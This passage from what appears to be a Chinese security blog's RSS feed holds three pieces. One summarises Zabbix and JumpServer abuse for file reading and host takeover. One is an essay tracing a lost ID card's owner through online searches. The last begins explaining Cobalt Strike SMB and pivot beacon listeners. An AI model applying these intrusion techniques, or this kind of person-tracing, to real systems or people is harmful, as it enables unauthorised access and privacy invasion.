data-ratio="0.45454545454545453" data-s="300,640" style="" data-type="png" data-w="1683" src="https://wechat2rss.xlab.app/img-proxy/?k=6f2c586b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CISXCJnzTL237EFyN9T3mPMSfqPvU3IngKTtwoTA9P9mSp2iaFztDdc8g%2F640%3Fwx_fmt%3Dpng"/></p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;"><span style="display: none;"></span>课代表划重点</h2><ol data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: decimal;" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;">Django的debug有时会闯大祸，同理其他debug也是，例如laravel等等。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;">Agent通过<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">zabbix proxy</code>对server进行数据上报的话，只有在<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">zabbix proxy</code>服务器上才能agent使用<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">zabbix_get</code>命令读取文件。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;">jumpserver的配置文件权限控制不严格，zabbix用户即可读。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">vfs.file.regexp</code> 可以突破 <code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">vfs.file.contents</code> 读取文件的大小限制。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;">通过配置文件中的<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">BootstrapToken</code>和<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">accesskey</code>可以实现通过服务账户控制jumpserver内的主机。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">EnableRemoteCommands</code> 参数未开启时可以关注 <code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">UnsafeUserParameters</code> 参数，避免措施打agent的机会。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;">jumpserver自带的脚本可以直接添加新用户进入系统。</section></li></ol><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">注：Roc木木的文章距离当前有一段时间，当时还没有出现  Polkit 和 DirtyPipe 提权。</p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;"><span style="display: none;"></span>LAST</h2><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">公众号荒废的这段时间里工作和生活都发生了很多的变化，不过没变的倒是自己一直以来疯狂欠学习的状态。有趣的事情倒是也遇到过一些、写过一些，有机会的话再发一发。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">两年多的时间风云变幻，疾病、战争、行业风口更迭，感谢还在关注的大伙们，祝大家健康平安，诸事顺遂。</p></section><p><br/></p>



<p><a href="2247484257">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=5249d967&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU1NDYxMTE5OA%3D%3D%26mid%3D2247484257%26idx%3D1%26sn%3D7d2f68f1f884545b4ad8cdf85398801d%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 23 Mar 2022 23:55:00 +0800</pubDate>
    </item>
    <item>
      <title>作文：记一次简单的寻人</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU1NDYxMTE5OA==&amp;mid=2247484073&amp;idx=1&amp;sn=bc1f49f889ca94c293ea7f0c9fb8b6bf</link>
      <description>记一次成功的“我有一个大胆的想法”以及与重庆人民的一次神奇邂逅。</description>
      <content:encoded><![CDATA[<p>
原创 <span>闲人王小明</span> <span>2019-08-22 00:56</span> <span style="display: inline-block;"></span>
</p>

<p>记一次成功的“我有一个大胆的想法”以及与重庆人民的一次神奇邂逅。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=a3ab30b9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh18fslINIdjuUBFHib3sHSCNZajdibFGZkIworUxibSB0d8RUjdxp6T3acWT7icvicekmhWZpLZpmYDticw%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<ul style="list-style-type: square;" class=" list-paddingleft-2"><li><p><span style="color: rgb(0, 0, 0);font-size: 24px;"><strong>前因</strong></span><span style="font-size: 15px;color: rgb(25, 25, 25);"></span><br/></p></li></ul><p><span style="font-size: 15px;color: rgb(25, 25, 25);">   <br/></span></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);">    一开始以为调休是不会同年假一样只有一年的保质期，所以像松鼠屯粮一样攒了很多。前几天突然好奇这件事，问过考勤的同事之后惊喜的得知——我有几天调休在本月就要过期了，于是计划申请休假。<br/></span></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);"></span><br/></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);">    之前攒假是蓄谋再骑一次318或者再环次台，然而膝盖已经不是那个17天干到布达拉宫的膝盖，赴台的自由行也凑巧因为最近局势原因暂时关闭。思忖再三，独乐乐不如众乐乐，同样放弃了飞乌鲁木齐骑独库的野念头，带家人再环一次青海湖才是一个男子汉成熟的决定。<br/></span></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);"></span><br/></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);">    联系好前年租过单车的老板，飞西宁然后大巴到西海镇包车出发旅行开始，第一天去过二郎剑景区后打算夜宿黑马河，下午到达帐篷民宿安置好行李，爸妈和妹妹要去外面草原上研究一下土拨鼠。虽然知道无聊但是作为攒局的人不能坏了大家的兴致，就陪他们一起出去，故事就由此开始了。</span><br/></p><p><br/></p><ul style="list-style-type: square;" class=" list-paddingleft-2"><li><p><span style="color: rgb(0, 0, 0);font-size: 24px;"><strong>中间</strong></span></p></li></ul><p><br/></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);">    土拨鼠猴精的东西，捉是捉不到的。高原地区的昼夜温差极大，太阳只要一落山，温度就会迅速降低。折腾到太阳被大山凉飕飕的阴影遮住，晚饭也差不多准备好时，他们终于打算往回走。<br/></span></p><p><br/><span style="font-size: 15px;color: rgb(25, 25, 25);"></span></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);">    这时路过一条小河，与其说是小河倒不如说是小水沟，其规模勉强算得上是黑马河的十八线支流。小河虽小但是其上却架着一座桥，走在桥上腰酸腿痛百无聊赖的王小明朝河里随意一瞥，注意力被一个有意思的东西吸引去。<br/></span></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);"></span><br/></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);">    大概因为工作的原因，对身份相关的东西多少会比较敏感一些，我意外看到河水里有一个红色的图案在一张卡片上若隐若现，而卡片的大小加上文字和图案的分布，基本可以断定这是一张身份证。<br/></span></p><p><br/><span style="font-size: 15px;color: rgb(25, 25, 25);"></span></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);">    河水很浅，我下桥把证件从水里捞出来时，爸妈还发现了证件主人的社保卡、两张银行卡和一张四川航空会员卡。卡片上已经有淡淡的一层青苔，没办法特别准确的分辨出掉到水里的时间，不过根据五张卡片的有效期限和发卡时间综合来看，这些卡片大概率是仍在服役期的。当时我爸说准是钱包被人偷了证件被丢进河里大水冲来的，我当时第一反应却是《追凶者也》里河边那场凶杀案。</span><br/></p><p><br/></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="1.3333333333333333" data-s="300,640" style="" data-type="jpeg" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=5daefe5d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh18fslINIdjuUBFHib3sHSCNic0GkfO10z04KFibcD0mUdDcLUjQSObgF94ANNeUCcEnHDx3Hu5phGjQ%2F640%3Fwx_fmt%3Djpeg"/></p><p style="text-align: center;"><strong><span style="color: rgb(25, 25, 25);font-size: 12px;">当时的情况</span></strong><span style="color: rgb(25, 25, 25);font-size: 12px;"></span><br/></p><p style="text-align: center;"><span style="color: rgb(25, 25, 25);font-size: 12px;">（如果要问我当时为什么要拍这张照片，只能说当时已经感觉自己大概率能找得到失主，提前给作文准备素材）</span><span style="font-size: 15px;color: rgb(25, 25, 25);"></span><br/></p><p><br/></p><ul style="list-style-type: square;" class=" list-paddingleft-2"><li><p><span style="color: rgb(0, 0, 0);font-size: 24px;"><strong>高潮</strong></span><br/></p></li></ul><p><span style="font-size: 15px;color: rgb(25, 25, 25);"><br/></span></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);">    同事们在家里忙感觉有点过意不去自己这忙里偷闲，景区玩遍归心似箭机票改签提前一天，于是故事的高潮就发生在收拾东西的今晚。</span></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);"><br/></span></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);">    首先万事皆要列框架的王小明此时列了一个寻人小框架，大概是下面这样的：</span><br/></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.6057692307692307" data-s="300,640" style="" data-type="png" data-w="624" src="https://wechat2rss.xlab.app/img-proxy/?k=888d6400&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh18fslINIdjuUBFHib3sHSCNEJricPukCIyvYVeiaREkddvIic1bWMlWUkqVDyicuFWglDLRFGCcNFlZTw%2F640%3Fwx_fmt%3Dpng"/><br/></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);"><br/></span></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);">    前三个应该比较好理解，因为这里的出发点比较有价值的只有身份证号，社保卡号码和银行卡号对此次行动的目标来说价值相对较小。<br/></span></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);"></span><br/></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);">    边缘逻辑慢慢凑的含义大体是根据几张卡片服务商的注册、找回密码、找回用户名等逻辑来尝试拼凑出打码之后的手机号明文，进而联系失主。不过这一设想在尝试之后作罢，支付宝的风控早已不是几年前的风控，其它一些金融机构倒是有可能存在突破口，不过边缘业务找起来太浪费时间，当前行动准则就是先做能做的。至于其他违法操作只是为了逻辑凑整想想而已，遵纪守法红星闪耀逻辑清晰的王小明是不会做本末倒置的事情滴。</span></p><p><br/></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);">    此时结合已有信息对失主进行一个简单的人物建模，86年生人可能会有一个9位的QQ号（所以一开始对以群昵称为关键字的qun关系搜索抱比较大的希望），大概率已经有孩子（可能会出现在昵称或者头像里），去青海大概率是旅游（结合现状以及四川航空金卡推测），看面相不像是个坏人（王小明毫无根据面相推理大法），因为掌握信息实在不多，所以人物画像也是模糊的很，同时模型也在随着掌握信息的增加在不断的变化和调整之中。</span><br/></p><p><br/></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);">    百度Google一通搜，当然360搜索和搜狗搜索也在框架逻辑之中，不过找到的信息基本都是重合的。首先最初的搜索关键字设置的是“重庆市 李XX”，因为失主名字稍微有点大众，搜索结果基本都是一些无用新闻，高效起见细化搜索关键字为“重庆市城口县 李XX”，此时有个不太显眼的搜索结果引起了我的注意。网页内容大致是一个当地礼仪服务公司的介绍黄页，上面有老板的手机号码和一个QQ邮箱，不过美中不足的是该QQ是十位的。搜到的此人所在的县城和姓名与身份证上的信息倒是完全吻合的，礼仪公司不大不小，似乎很符合小老板闲来无事去青海旅个游不小心丢了身份证的剧情。</span></p><p><br/></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="1.1561119293078055" data-s="300,640" style="" data-type="png" data-w="1358" src="https://wechat2rss.xlab.app/img-proxy/?k=29ce1cc8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh18fslINIdjuUBFHib3sHSCN9y09vlyp67g712vho2BR2SqdlNeM1hTSpdibWoWGI6wkGKfTcNic38WA%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);">    过完了两个主要的搜索引擎没有发现特别有价值的信息，准备找朋友帮查群昵称的同时对该手机号和QQ号进行了简单的周围信息探测。手机号搜的到微信，头像和昵称也是公司经营内容相关，说明手机号码大概率还在使用，QQ是一位女士的，看照片墙上天天p图的行为大概率也是个中年女性。</span></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="1.4400871459694988" data-s="300,640" style="" data-type="jpeg" data-w="918" src="https://wechat2rss.xlab.app/img-proxy/?k=c691669e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh18fslINIdjuUBFHib3sHSCNzibc4ZTPa7wJKtIzaSvzUyZVTPcaicJuJSztltQZAiapaMWAa6WCicz8uA%2F640%3Fwx_fmt%3Djpeg"/></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="2.0579710144927534" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=5e038e7d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh18fslINIdjuUBFHib3sHSCNqY9q9AicxeibWEyXbicnvSN2LiarGO0XBYNiaPA6U9D3D1otQWLotp8EqYg%2F640%3Fwx_fmt%3Djpeg"/></p><p><br/></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);">    仍旧得不到什么实锤信息的情况下就打算启动备选方案主动加微信联系一下搜到的这个李XX老板老哥试一下，当然此时已经做好了应付恶人以及其他突发事件的心理准备，比如真的有凶杀案、失主要报警等等。<br/></span></p><p><br/><span style="font-size: 15px;color: rgb(25, 25, 25);"></span></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);">    加上了老哥好友，是直接不用验证就通过的那种，试探性的询问了一下，大概十分钟左右收到了回复。老哥好像平时不怎么说普通话，自诩无师自听得懂四川话和重庆话的王小明竟然听的有点懵逼。</span><br/></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="2.407224958949097" data-s="300,640" style="" data-type="jpeg" data-w="609" src="https://wechat2rss.xlab.app/img-proxy/?k=621a90d0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh18fslINIdjuUBFHib3sHSCNclRcgOr7BkRRUj8As3wZibHJn01tuDB42uzaCdnIogOia3ziabwqMgocw%2F640%3Fwx_fmt%3Djpeg"/></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);"><br/></span></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);">    老板一直问我现在在哪个位置，忍不住有点戒备心理。一开始以为是他的员工的，后来他又说马上联系失主，只是觉得老板老哥说话听上去比较客气也挺仗义，但是没听明白他要怎么去联系失主，不过有个热心的本地人帮忙的话找到的几率总是要大很多，不管他是开车上门找失主还是怎样。<br/></span></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);"><br/></span></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);">    最后不忘舔老板一手，事半功倍。</span><br/></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="5.622720897615708" data-s="300,640" style="" data-type="jpeg" data-w="713" src="https://wechat2rss.xlab.app/img-proxy/?k=c62a3e39&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh18fslINIdjuUBFHib3sHSCNCvYNbDYBx6zA7cRARSpYtvRatWicFrpHplMkDFtWke6FumYuHkn4dlw%2F640%3Fwx_fmt%3Djpeg"/></p><p><br/></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);">    原打算跟老板老哥聊天结束之后继续去进行群昵称搜索，没过几分钟一个重庆的电话打来，电话对面的老哥有点激动，一开始我以为是礼仪的老板打电话过来要向我交待什么，到电话对面说：“你是要确认我的身份么？”时我才反应过来，失主已经找到了，打来电话的这个人就是证件的失主。<br/></span></p><p><br/><span style="font-size: 15px;color: rgb(25, 25, 25);"></span></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);">    一番交流后了解到失主大概是六七月份到青海旅游，当时丢失的是一个棕色的钱包和三百多现金，结合发现卡片的位置和失主的陈词，推测这些证件大概率是钱包被偷和被捡之后为拿走现金的人所丢弃到桥下。比较愉快的是失主老哥十分客气，电话里不断的说谢谢，还一直要答谢我。<br/></span></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);"><br/></span></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);">    我更好奇的当然是老板老哥是如何做到这么短的时间之内就找到失主的，一开始电话里失主老哥很激动，在不停的说着证件上的内容，终于被我找到机会插话询问老板老哥是如何联系到他的。才得知原来两个老哥完全重名，但是在不同的镇子，不过因为两人在同一个微信群里且互相知道对方的存在，所以老板老哥信心满满且迅速的找到了失主老哥。王小明逻辑缜密的寻人框架就这么简单的被solve掉了。</span></p><p><br/></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);">    加了微信确认是本人之后答应给老哥顺丰到付寄过去，喜获老哥开心的</span><img style="display:inline-block;width:20px;vertical-align:text-bottom;" data-ratio="1" data-w="20" src="https://wechat2rss.xlab.app/img-proxy/?k=d760a0cc&amp;u=https%3A%2F%2Fres.wx.qq.com%2Fmpres%2Fhtmledition%2Fimages%2Ficon%2Fcommon%2Femotion_panel%2Fsmiley%2Fsmiley_0.png"/><span style="font-size: 15px;color: rgb(25, 25, 25);">三枚。</span></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="7.126728110599078" data-s="300,640" style="" data-type="jpeg" data-w="434" src="https://wechat2rss.xlab.app/img-proxy/?k=8f96f1e2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh18fslINIdjuUBFHib3sHSCNzSlrIYuY5BzdG6fiaMfDicHMV6SgGicLEPNSAMhAiagU1AbP2soTwfCBlA%2F640%3Fwx_fmt%3Djpeg"/><br/></p><p style="text-align: center;"><br/></p><ul style="list-style-type: square;" class=" list-paddingleft-2"><li><p><span style="color: rgb(0, 0, 0);font-size: 24px;"><strong>晚安</strong></span></p><p><span style="color: rgb(0, 0, 0);font-size: 24px;"></span></p><p><span style="color: rgb(0, 0, 0);font-size: 24px;"></span></p></li></ul><p><span style="font-size: 15px;color: rgb(25, 25, 25);"><br/></span></p><p><span style="font-size: 15px;color: rgb(25, 25, 25);">搞的老爸老妈也有点兴奋，早点休息明天给老哥寄快递。</span></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="2.0405701754385963" data-s="300,640" style="" data-type="jpeg" data-w="912" src="https://wechat2rss.xlab.app/img-proxy/?k=2de6cf14&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh18fslINIdjuUBFHib3sHSCNQPEVYPFiamYH1Tx8f3Ofbh8KszZXDBSGNo6swkibmj8ibf8TcqicKLHY1Q%2F640%3Fwx_fmt%3Djpeg"/></p><p><br/></p>



<p><a href="2247484073">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=4b94471f&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU1NDYxMTE5OA%3D%3D%26mid%3D2247484073%26idx%3D1%26sn%3Dbc1f49f889ca94c293ea7f0c9fb8b6bf%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 22 Aug 2019 00:56:00 +0800</pubDate>
    </item>
    <item>
      <title>Cobalt Strike几种不那么常见的上线方式小记</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU1NDYxMTE5OA==&amp;mid=2247484055&amp;idx=1&amp;sn=90641c586480817d5b5bb1eb92e73b5f</link>
      <description>手把青秧插野田, 低头便见水中天。心地清净方为道, 后退原来是向前。</description>
      <content:encoded><![CDATA[<p>
原创 <span>华北抬杠大赛亚军</span> <span>2019-07-16 14:56</span> <span style="display: inline-block;"></span>
</p>

<p>手把青秧插野田, 低头便见水中天。心地清净方为道, 后退原来是向前。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=9b993809&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal50BMRTtSswSZpGVIy9S1vzpSfOQciaFBN3nyIu5pQz3RIcFqMrNPxxPXA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p><br/></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.4975124378109453" style="" data-type="gif" data-w="402" src="https://wechat2rss.xlab.app/img-proxy/?k=1a91b3b2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal50Wy3puYhag2WxO6Yhoe7TfKjaJS5Sk6cHtJdmZbXibXnmwOeia1kE4GibQ%2F640%3Fwx_fmt%3Dgif"/><br/></p><h3 class="md-end-block md-heading" style="box-sizing: border-box;font-size: 1.5em;margin-top: 1rem;margin-bottom: 1rem;font-weight: bold;line-height: 1.43;cursor: text;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span class="md-plain md-expand" style="box-sizing: border-box;">引子</span></h3><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">我有一个朋友，很喜欢下定论，还很能BB。我痛恨下定论，也很能BB，所以我们伴随着剁手指这种赌注进行技术交流的结果大多数都是在众人的哄笑中其中一人的面红耳赤，因为抬杠总要有输赢（当然是我赢得多嘻嘻）。不过把东西都摊在明面上也好，我认为对外的知识辐射可以让一个人获得成长，像这种深刻的方式更甚。虽然争论不是他死就是我亡，但是总要好过把自己架的高高在上只会指指点点却输不起。</span></p><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">说到cobalt strike（后文简称cs）新出的Pivot Listeners上线方式，朋友使用的时候没找到选这个 Listener的地方，在跟他的朋友商量之后得出结论：这是个BUG。在一旁苟着的我敏锐的嗅到了锤他的机会，遂有此文。</span></p><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">这里不只单独介绍Pivot Listeners，顺带说一下几个不那么常见的上线方式，仅做记录之用，水平过于有限导致疏漏在所难免，还请看官师傅们不吝石锤。<br/></span></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.38171185539606595" data-s="300,640" style="" data-type="png" data-w="1881" src="https://wechat2rss.xlab.app/img-proxy/?k=f60c86a6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal50j2k5u5b8hwzdwb61LDuDk6Gqbgo8Fu2o0ic6DAXN5s1F3T9xDmt9Hxg%2F640%3Fwx_fmt%3Dpng"/></p><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">192.168.231.129有两张网卡，一个可以连接外部互联网，一个不能。192.168.231.128只有一个网卡，不能连接外部互联网。</span><span style="box-sizing: border-box;font-size: 15px;color: rgb(49, 47, 47);"></span><span class="md-plain" style="box-sizing: border-box;"></span><br/></p><h3 class="md-end-block md-heading" style="box-sizing: border-box;font-size: 1.5em;margin-top: 1rem;margin-bottom: 1rem;font-weight: bold;line-height: 1.43;cursor: text;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span class="md-plain" style="box-sizing: border-box;">smb</span></h3><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">&#34;SMB Beacon使用命名管道通过父Beacon进行通信，这种点对点通信借助Beacons在同一台主机上实现，它同样也适用于外部的互联网。Windows当中借助在SMB协议中封装命名管道进行通信，因此，命名为SMB Beacon。&#34;个人感觉该类型的listener比较适用于目标机器无法连接外网的情况，同时也在一定程度上可以起到规避防火墙的作用。在Attacks - &gt; Packages - &gt; Windows Executable（S）这里支持导出该类型listener对应的可执行文件或者dll等。配合可执行文件使用的命令是link和unlink，</span><span style="box-sizing: border-box;font-size: 15px;color: rgb(0, 0, 0);"><strong 